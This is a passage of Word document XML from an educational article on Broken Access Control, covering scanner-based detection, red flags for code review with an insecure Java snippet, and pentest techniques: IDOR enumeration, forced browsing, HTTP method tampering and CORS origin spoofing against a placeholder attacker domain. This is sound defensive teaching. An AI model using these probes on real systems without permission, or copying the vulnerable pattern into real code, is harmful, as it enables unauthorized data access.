        <w:t xml:space="preserve"> provided by the client, the database returns the private financial data of User 8850. The server packages this data into a JSON response and sends it back to the attacker, resulting in an unauthorized information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556EFBE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Discovery &amp; Identification (How to Find It)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338263D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Automated Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FC050"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Because access control is bound to unique, custom business logic, automated tools traditionally find this flaw difficult to map. However, they are highly effective at finding specific technical patterns that lean toward Broken Access Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392181D9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Static Application Security Testing (SAST):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAST tools scan raw source code. They flag anomalies like endpoints lacking authorization annotations (e.g., a Spring Boot controller missing @PreAuthorize or a web route lacking a middleware guard). They also search for default configuration weaknesses, such as a wildcard * configuration in Cross-Origin Resource Sharing (CORS) headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F31EE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dynamic Application Security Testing (DAST) &amp; Vulnerability Scanners:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAST tools interact with a running application. Advanced scanners simulate multiple user roles (e.g., User A and User B). The scanner will log in as User A, extract a session token, log out, log in as User B, and then attempt to access User A's private URLs using User B's token. If the server responds with a 200 OK instead of a 403 Forbidden or 401 Unauthorized , an anomaly is flagged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB57F9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Manual Code Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A9D22"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 xml:space="preserve">When auditing source code directly, human reviewers can spot contextual flaws : that scanners miss. Look out for these specific </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>red flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B0B99" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Direct Parameter Passing to Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for code that grabs a request parameter and maps it straight into a data query without ownership verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08DC27" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF28979" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">// RED FLAG: Blindly trusting the user-supplied asset ID public Appointment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>getAppointment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">(String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>appointmentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">) { return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>database.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>appointmentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590E7D5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// Missing check: if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>appointment.getUserId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">() != </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>currentUser.getId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531AC067" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44540A28" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Allow-by-Default" Framework Routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look at your application routing configuration files. If the code requires developers to manually declare which paths are private rather than blocking everything by default, it is a ticking time bomb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67167918" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardcoded Roles or Client-Side Trust:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Search for frontend checks determining server execution. For example, if a backend endpoint pulls a user's role straight from a mutable HTTP cookie or an unverified JWT payload field (like {"role": "user"}) without checking its cryptographic signature, it indicates a critical access control flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64308261" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Missing HTTP Method Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for generic routing mappings (e.g., using a blanket @RequestMapping in Java or a generic router in Node.js) that accept POST, PUT, or DELETE requests on an endpoint that was only designed to safely handle public read-only GET requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406BC53" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01738403"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Penetration testers look past the visual boundaries of an application to actively stress-test the backend rules using specific tactics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C21FC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Direct Object References (IDOR) Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tester sets up two browser sessions or uses an interception proxy (like Burp Suite). They capture a request to a private resource (/v1/download/invoice_8501.pdf) and sequentially increment or decrement the identifier numbers (invoice_8502.pdf, invoice_8503.pdf). If the system serves these files without validation, the vulnerability is confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0918C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Forced Browsing (Predictable URL Guessing):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testers use wordlists to guess restricted backend directories and unlinked administration panels. They will strip away frontend directories and attempt to directly navigate to hidden paths like /admin, /dashboard/settings, or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/v1/internal/export-users while logged out entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6C745D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP Method Tampering:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a tester receives a 403 Forbidden when attempting to access a page via a GET request, they will re-try the exact request but switch the HTTP method to POST, PUT, or use a custom header like X-HTTP-Method-Override: GET . Poorly written backend firewalls often</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8D8B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>filter requests based purely on the method string, allowing alternative methods to slip past unauthorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105EE8E2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CORS Origin Spoofing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testers will modify the Origin header in an API request to an arbitrary value (e.g., Origin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0083079C">
          <w:rPr>
            <w:rStyle w:val="Heading4Char"/>
            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://malicious-attacker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">). If the server responds with Access-Control-Allow-Origin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0083079C">
          <w:rPr>
            <w:rStyle w:val="Heading4Char"/>
            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://maliciousattacker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> alongside Access-Control-Allow-Credentials: true, they have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418D801"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confirmed an access control breach capable of exploiting regular users via their browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68237727" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Impact Assessment (Damages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339EF660" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Technical Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E873B"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When Broken Access Control is exploited, the technical damage to the host system and database layer is often absolute, as the attacker effectively bypasses the software's logical boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976D1C6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mass Unauthorized Information Disclosure (Data Leakage):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
